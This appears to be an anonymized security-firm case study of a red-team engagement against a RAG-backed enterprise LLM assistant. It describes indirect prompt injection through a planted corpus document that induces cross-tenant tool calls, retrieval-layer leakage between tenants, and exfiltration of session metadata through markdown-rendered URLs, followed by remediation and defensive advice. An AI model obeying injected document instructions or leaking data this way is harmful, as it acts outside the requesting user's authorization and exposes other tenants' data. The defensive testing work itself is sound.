Prompt-Injection and Tool-Misuse in a RAG-Backed Internal Assistant

Red-team engagement against a customer-built LLM assistant integrated with internal data sources and tools.

By Gleb Z.

Anonymized at the customer’s request. Specifics of the LLM provider, RAG source corpus, and tool surface are abstracted; engagement structure and finding categories are real.

Engagement at a glance

Sector: SaaS — enterprise productivity, internal-deployment AI assistant.
System under assessment: Customer-built LLM-backed assistant. RAG against an internal document corpus; tool surface included a CRM read API, an internal knowledge wiki edit API, and a sandboxed code-execution path.
Engagement model: Custom Engagement — 6 weeks (split: 2 weeks threat modeling and architecture review, 3 weeks adversarial testing, 1 week reporting and walkthrough).
Methodology stages run: all six stages — including a structured Threat Modeling pass using the OWASP LLM Top 10 plus the customer’s internal trust-boundary documentation.

What the customer asked us to validate

The assistant was about to be promoted from beta (internal-only) to enterprise tenants. The security team wanted to know: given a hostile RAG document or a hostile chat input, could an attacker exfiltrate data outside the requesting tenant’s scope, or trigger a tool action against a different tenant’s resources? The architecture had been designed with these concerns in mind; the question was whether the implementation matched the intent.

Threat model

Two adversary classes were modeled. The first: a current tenant user who wants to abuse the assistant’s tool surface beyond their authorization. The second: an external attacker who can plant a document into a tenant’s RAG corpus and wait for an internal user to query against that corpus. We did not model nation-state or supply-chain compromise of the underlying LLM provider, per scope.

What we found

Three categories of finding worth highlighting at a public level:

Tool-permission scoping bypass via indirect prompt injection. A maliciously crafted document, once ingested into a tenant’s RAG corpus, could induce the assistant to call a tool action with parameters drawn from a different tenant’s session context, in a narrow window. This was the most consequential finding. Exploitation required cooperation between specific conditions; we exploit-validated it under lab conditions matching the customer’s production architecture.
Cross-context data leakage in the RAG retrieval layer. A retrieval-rank tie-breaker, under specific embedding-space conditions, surfaced snippets from tenant A’s documents when tenant B asked a sufficiently generic question. This was not a prompt-injection finding per se — it was a retrieval-layer logic bug — but it was discovered as part of the same engagement.
Output-channel leakage via markdown rendering. Assistant responses passed through a markdown renderer that did not consistently strip remote-resource references. Crafted output could induce the renderer to fetch attacker-controlled URLs at display time, leaking session metadata via referer.

We documented each finding with reproduction artifacts, severity ratings using the customer’s internal CVSS-equivalent rubric, and a discussion of why the path existed structurally.

How the customer remediated

The cross-tenant tool action was closed via a strict per-call permission re-derivation pattern at the tool-execution layer — tool actions now derive their authorization context only from the requesting session, not from intermediate state set up by RAG-derived content. This was a meaningful architectural change.

The retrieval layer finding was patched in the embedding-rank logic. The markdown renderer was replaced with a stricter allowlist-based renderer.

All three findings passed remediation re-check within 30 days.

What this engagement illustrates

LLM-integrated systems with tool surfaces are not a single attack-surface category. They span at least three: the prompt-input layer, the retrieval layer, and the output-rendering layer. Engagements that treat them as one category miss findings at the boundaries between them. The cross-tenant tool action above was a boundary finding — it required the RAG retrieval layer and the tool-execution layer to be reasoning about authorization differently, and neither team had noticed the discrepancy.

This is a representative shape for AI & ML System Security engagements, particularly against AI/ML Product Companies shipping LLM features to enterprise tenants.

Why this finding existed structurally

The cross-tenant tool-action finding existed because two engineering teams were reasoning about authorization differently and neither team had noticed the discrepancy. The RAG retrieval team reasoned about authorization at the document level — each tenant’s documents were correctly scoped, and retrieval correctly filtered by tenant identity. The tool-execution team reasoned about authorization at the session level — each session correctly carried tenant identity, and tool invocations correctly authorized against that identity. Both teams were correct within their layer’s frame.

The boundary case was the tool invocation that took its parameters from RAG-retrieved content. The tool-execution layer authorized the invocation against the requesting session’s tenant identity; the parameters being passed, however, were derived from content authored under a different tenant identity. Neither team had a frame in which “authorization of a tool call” included “authorization of the parameters passed to the tool call.”

This is a representative shape for security findings in LLM-integrated systems: the finding is not a bug in any single layer but a gap in the trust model that spans layers. Single-layer testing rarely surfaces it. Coordinated testing that explicitly looks at the boundaries between layers does surface it, but boundary testing is rarely scoped because no single layer team feels responsible for it.

How to avoid this class of finding

For teams building LLM-integrated systems with tool surfaces, we recommend the following defensive posture:

Make trust-boundary documentation explicit at the system level. Document not just “what authorization applies to each operation” but also “where does the authorized parameter set come from, and what trust level does it carry.” Discrepancies surface during documentation work, before they surface during exploitation.
Adopt per-call permission re-derivation as the default for tool invocations. Tool execution should derive its authorization context from the requesting session, not from intermediate state set up by RAG-derived content or by upstream tool outputs. This is the architectural fix the customer chose, and it generalizes to most LLM-integrated tool surfaces.
Treat the retrieval layer as an attack surface. Documents in the RAG corpus can be authored by any party with corpus-ingestion access, including parties whose interests do not align with the tenant whose query triggered the retrieval. Indirect injection through retrieval is a category of attack that pure input sanitization at the user-input layer cannot address.
Treat output rendering as an attack surface. Markdown renderers, HTML renderers, and similar output-processing components can be induced to fetch resources or execute output-side actions. The renderer should treat model output as untrusted content even when the model itself is trusted.

Defensive guidance for adjacent architectures

The boundary-pattern finding generalizes beyond this engagement’s architecture. The shape recurs because LLM-integrated systems introduce intermediate processing layers that carry untrusted content but appear trusted to downstream consumers — and the architectural fix is to make that trust gradient explicit. Agentic systems with multi-step tool chains are vulnerable at the gap between planning and execution; authorization checks should re-derive from session state at execution time rather than being cached from planning time. Multi-tenant fine-tuning and retrieval-augmented training pipelines have the same pattern between document ingestion and inference, and benefit from end-to-end provenance tracking. LLM-mediated workflow automation in regulated industries inherits the pattern at the gap between machine-suggested and human-approved actions; the human reviewer should evaluate against the same authorization context the automated path would have used.

The finding category is documented systematically in our Five-Boundary Attack-Surface Taxonomy — specifically Scenario A (Retrieval → Output leakage) and the boundary-pattern findings between tool-integration and persistence boundaries. The defense posture appropriate to this engagement’s deployment shape (enterprise LLM with moderate tool authority) is described in the Five-Family Posture Matrix under Section 2.2.

Frequently asked questions

Why publish this case study if findings are anonymized?

The structural shape of the finding — boundary-pattern between RAG retrieval layer and tool-execution layer — recurs across enterprise LLM deployments. Other teams shipping similar architectures benefit from the architectural pattern even without the specific customer details. The anonymization protects the customer; the publication protects everyone else shipping a similar system.

Could a smaller team have caught this finding internally?

In principle yes, but the boundary lived in the seams between two engineering teams (RAG retrieval team and tool-execution team), and neither team’s local review surfaced it. The remediation pattern that worked — per-call permission re-derivation from session state — is a single architectural rule; the hard part is recognizing that the rule is needed. External assessment provided the cross-team frame that the internal teams did not have positional access to construct.

Does the engagement model — Custom Engagement at 6 weeks — generalize to other LLM assessments?

The 6-week duration is typical for an LLM-integrated assistant with moderate complexity: 2 weeks of threat modeling and architecture review, 3 weeks of adversarial testing, 1 week of reporting. Simpler architectures (a chat interface with no tool surface) compress to 3-4 weeks. Agentic systems with multi-step tool chains and persistent state expand to 8-12 weeks. The structure of the methodology stages stays constant; only depth and scope at each stage scale.

Why is the cross-tenant tool action ranked as more consequential than the cross-context data leakage?

Both are serious, but the cross-tenant tool action represents an active capability — an attacker can induce the system to perform actions in a different tenant’s authorization context. The cross-context data leakage is a passive disclosure — a generic question may surface another tenant’s content. The active-vs-passive distinction matters for blast radius: tool actions can write, modify, and trigger downstream effects; passive disclosure leaks information about queries that happened.

How long should the remediation re-check window be for an LLM-system engagement?

We schedule the re-check 30-60 days after engagement close depending on the finding category. Architectural fixes (like per-call permission re-derivation) usually need 30-45 days to land cleanly and be observable in production traffic. Library swaps (like replacing a markdown renderer) usually resolve faster. The 60-day window in our standard methodology is the upper bound; this engagement closed cleanly at 30 days because all three findings were addressable with bounded code changes rather than redesign work.

Service line: AI & ML System Security
Industry: AI/ML Product Companies and Enterprise AI Deployments
Companion research: Five-Boundary Attack-Surface Taxonomy for LLM Applications · Prompt-Injection Defense Architecture — The Five-Family Posture Matrix
Glossary: Prompt Injection · OWASP LLM Top 10
FAQ: LLM red teaming vs prompt injection — what’s the difference?